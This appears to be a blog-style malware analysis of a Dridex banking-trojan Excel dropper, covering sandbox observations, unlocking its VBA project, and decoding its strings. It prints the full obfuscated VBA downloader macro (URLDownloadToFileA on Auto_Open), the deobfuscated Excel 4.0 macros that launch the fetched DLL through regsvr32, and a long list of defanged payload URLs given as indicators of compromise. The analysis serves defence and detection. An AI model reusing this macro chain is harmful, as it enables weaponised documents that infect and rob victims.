After reviewing report from Center for Internet Security(CIS) for 10 Top malware on 2020. The curiosity took me to analyze Dridex malware for knowing why it was the first malware on CIS report.
Dridex is a banking trojan that uses malicious macros in Microsoft Office with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns.
Like typical weaponized Office documents, this document uses social engineering to ask for enabling macro execution upon opening the file.
After enabling content nothing changed on the excel file but in the background there was a different story.
Run Process Monitor and FakeDns to view the excel file activities.
- Excel.exe process resolved (basis.ivpr.org) domain.
- Excel.exe process created child process(regsvr32.exe -s C:\Users\User\AppData\Local\Temp\uevzwkvm.dll)
One each time run the file, get a different domain and a different dll name.
To know how the macro works, I used Microsoft Visual Basic tool embedded in an Excel application.
But the project Locked and unviewable. EvilClippy tool for unlocking the project.
Now it is able to see 3 sheets and VBA code, while I just saw only one sheet before unlocking the project.
On the visible option there were 3 choices (Visible, Hidden and very hidden). The sheet1 had an enabled visible option for others sheets were disabled.
VBA MACRO Module1.bas
in file: xl/vbaProject.bin — OLE stream: u’VBA/Module1'
- — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
#If VBA7 And Win64 Then
Private Declare PtrSafe Function X_resize_Page1 Lib “urlmon” _
Alias “URLDownloadToFileA” ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function X_resize_Page1 Lib “urlmon” _
Alias “URLDownloadToFileA” ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Function mixcols()
mixcols = g_r_book(4, 4) & g_r_book(3, 55)
End Function
Function g_r_book(s, j As Integer)
If j > 5 Then jj = 1 Else jj = -1
For Each u In Sheets(s).UsedRange.SpecialCells(xlCellTypeConstants): m = u: Next
v1 = Split(StrConv(m, 64), Chr(0)): For Each vv1 In v1: On Error Resume Next: k = k & Chr(Asc(vv1) + jj): Next: g_r_book
= k
End Function
Function valPrices()
valPrices = 5–3
End Function
Function restDue(yel As Integer)
restDue = “$”
If yel = 2 Then restDue = “]”
End Function
Sub Auto_Open()
Dim O As Integer: Dim Oa As Integer: ol = 1
Sheets(ol).Cells(valPrices, ol).Name = ds_po3 & “len”: govs = mixcols
Oa = 9: kij = Split(govs, “=”): x_p_cl = Split(kij(ol), restDue(valPrices)): aa = 2
For a = 1 To UBound(x_p_cl) — LBound(x_p_cl) + 1
On Error Resume Next
Sheets(ol).Cells(aa, ol).value = “=” & x_p_cl(a): Run (ds_po3 & “len”)
If a = 13 Then directoo = P_new_price
If a = 15 Then
fillename = P_new_price
X_resize_Page1 0, a_timers(Split(kij(0), restDue(Oa))), directoo & “\” & fillename, 0, 0
End If
Next
kj = 8: Sheets(ol).Range(“A1:B6”).Clear
End Sub
Function ds_po3()
ds_po3 = “This_”
End Function
Function a_timers(nimo As Variant) As String
Randomize: df = 2–1: a_timers = nimo(Int((UBound(nimo) + df) * Rnd))
End Function
Function P_new_price()
P_new_price = Sheets(1).Range(“B1:B5”).SpecialCells(xlCellTypeConstants)
End Function
I wrote python code for deobfuscation Strings embedded on sharedStrings.xml. The result divided to two parts (links and XLM (Excel 4.0) macros):
links :
http://trezors[.]io[.]mahlongwa[.]com/rexj53wq[.]zip
http://wiki[.]deveyesgroup[.]com/zbd2ng4j[.]zip
http://cpanel[.]takeorders[.]co[.]uk/kzwc4s[.]zip
http://nlmcvt[.]blissgene[.]com/grh5fw[.]rar
http://t4p[.]autors[.]pt/hk1sqc[.]rar
http://oasis[.]ivpr[.]org/kek4cz[.]zip
http://app-halifax-mobileverification-mobileappupdate-system-update[.]cgsconstructores[.]com/abwtwv3x[.]zip
http://peau2[.]ivpr[.]org/sgo2vq0[.]zip
http://challengebarbell[.]co[.]in/vy6evt[.]zip
http://ebay[.]vehicle[.]sales[.]aketbd[.]com/ssvklay[.]rar
http://urbantrapfest[.]cl/byd2p9[.]zip
http://4evakleen[.]com[.]au/mq722o00t[.]rar
http://junzhang[.]webme[.]us/wiwl81d[.]zip
http://web[.]guatemayavirtual[.]com/yqqu2ex[.]zip
http://40fortyfoods[.]com/dwujyxoyd[.]rar
http://qdtoolkit[.]thelaeffect[.]com/cm96j9axl[.]zip
http://mail[.]qcvmail[.]com/k5fhmlr[.]zip
http://miloscolic[.]bplaced[.]net/bsanc5ak[.]zip
http://dentart[.]elitemarketing[.]hu/upeb9y2m[.]rar
http://sellitzer[.]perkss[.]co[.]uk/spqo38ic[.]zip
http://franchising[.]phone-recovery[.]it/ya75s29h[.]zip
http://noblesteel[.]com[.]au/eev8fmc[.]rar
http://jaalifestyle[.]my[.]id/z90r05[.]rar
http://agritork[.]com[.]tr/er7itgi[.]rar
http://demo[.]opacokitchens[.]com/dq9b7u[.]zip
http://scrap[.]nepalesehost[.]com/bde07cx[.]zip
http://messagesecureapp[.]duckdns[.]org/qh528ype[.]zip
http://marlenesbrothel[.]com[.]au/jcp05s[.]zip
http://plajart[.]com/gj1qlwo[.]rar
http://0007[.]name/t7kw7bb[.]zip
http://thnconsult[.]com/dbmbyhh[.]rar
http://ofice[.]seriesnow[.]website/qbeda328[.]rar
http://shadowsecinjector[.]cf/pymp0wkh[.]zip
http://staging[.]lincmagazine[.]deveyesgroup[.]com/duruhbp6[.]zip
http://taoyonghao[.]webme[.]us/szuadd[.]rar
http://messagesecurepaypal[.]duckdns[.]org/jf8s8z[.]rar
http://queensradiationtherapy[.]com/dbaobi[.]zip
http://valeriaromero[.]com/gsb509kb[.]rar
http://controlcenter[.]mystand[.]pt/lzvngo469[.]rar
http://vanzare[.]cabanabrazi2[.]ro/od14p7v[.]rar
http://sanelcorp[.]com/zo8me9g[.]rar
http://bigcomics[.]cf/zklovc4vb[.]rar
http://misturafinapizzaria[.]com[.]br/ex4k9x[.]zip
http://str[.]shoppclick[.]com/hasb2l[.]zip
http://download[.]nepalesehost[.]com/wyvnrv0z[.]rar
http://picinfor[.]com/nbwqh6n0[.]zip
http://vienen[.]gblix[.]srv[.]br/fdwzkmx[.]rar
http://lanjar[.]seriesnow[.]website/x16t6gr7[.]zip
http://ozdomb[.]elitemarketing[.]hu/xax7k4mlp[.]zip
http://amirartstudio[.]com/oc87ak5[.]rar
http://areins[.]org/dkwjfvif[.]zip
http://liquidglovehandsanitizer[.]com/fjkfv3s[.]zip
http://tokajkonferencia[.]elitemarketing[.]hu/bmaxb7d[.]zip
http://tit[.]elitemarketing[.]hu/j0wq82a[.]zip
http://freightnet[.]drapac[.]com/lss2lh[.]zip
http://down[.]seriesnow[.]website/k92u9vb[.]rar
https://atamakultura[.]com/sdq3lsdzp[.]zip
http://teneth[.]co[.]za/lev5e9[.]rar
https://mertlog[.]com/o3ef15[.]rar
https://smsh[.]care/k1xjwsax[.]zip
http://imbueautoworx[.]co[.]za/jpfnnl2g[.]zip
https://royallogistic[.]info/sj5a1ajw[.]rar
http://itake1[.]com/ihrlkispj[.]zip
https://huevacations[.]com/ot0g7ot[.]zip
https://uisusa[.]uisusa[.]com/fmqmmw[.]zip
https://www[.]networkaruba[.]com/k9kl6e[.]rar
https://immigration[.]omsms[.]in/lin58hwsh[.]zip
https://supergrafperu[.]com/aeknas[.]rar
http://2015[.]grupokeithmar[.]com/bhn10bigh[.]rar
http://isiphephelocon[.]co[.]za/h33pky[.]rar
https://arm[.]backyardproject[.]net/bdu3uazp[.]zip
https://rajibpalit[.]ifunnelspro[.]com/megv9bls6[.]zip
http://f1sol[.]com/ibnt6ia[.]rar
https://gonzalezsirit[.]techsavvyway[.]com/t39cqvcu[.]rar
https://afautomotores[.]com[.]py/nzr55o[.]zip
https://torresquinterocorp[.]com/w50lew[.]zip
http://funamituristico[.]org/ivt9yh12[.]rar
https://app[.]mirrorlabelsindia[.]com/zlmfkl[.]rar
http://fakihlaw[.]atwebpages[.]com/rybt1i[.]rar
https://demo[.]omsms[.]in/iri3np7[.]rar
XLM (Excel 4.0) macros:
SET.NAME(“b0b”,CHAR(101))
SET.NAME(“i0”,”J”)
SET.NAME(“w000”,”\”)
IF(ISNUMBER(SEARCH(“do”,GET.WORKSPACE(1))),`y112G`,CLOSE(FALSE))
SET.NAME(“o0”,”32")
CANCEL.KEY(TRUE)
SET.NAME(“w00”,b0b)
CANCEL.KEY(TRUE)
SET.NAME(“v0”,”O”)
SET.NAME(“ohgdfww”,”h”&w00&”llEx”&w00&”cut”&w00)
SET.NAME(“wegb”,”Sh”&w00&”ll”)
SET.NAME(“bb”,LEFT(GET.WORKSPACE(23),(FIND(“Roaming”,GET.WORKSPACE(23),1)-1))&”Local”&w000&”T”&b0b&”mp”&w000)
SET.VALUE(B2,bb)
SET.NAME(“ab”,LEFT(CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97),RAND()*8+5)&”.dll”)
SET.VALUE(B2,ab)
CALL(wegb&o0,”S”&ohgdfww&”A”,i0&i0&”CCCC”&i0,0,v0&”p”&w00&”n”,”r”&w00&”gsvr”&o0,”`y112G`-s`y112G`”&bb&ab,0,0)
//Call(Shell32,ShellExecuteA,JJCCCCJ,0,Open,regsvr32,”`y112G`-s`y112G`”C:\Users\[User]\AppData\Local\Temp\[xxx].dll,0,0)
The VBA code after decoding strings choice one of links randomly for downloading malicious .dll, then run Call() function on XLM macros to run malicious dll.
Summery : Now we have good visibility for one of top 10 malware on 2020. We can used links as IOCs to check your environment and block(Not all Engines detected all links).
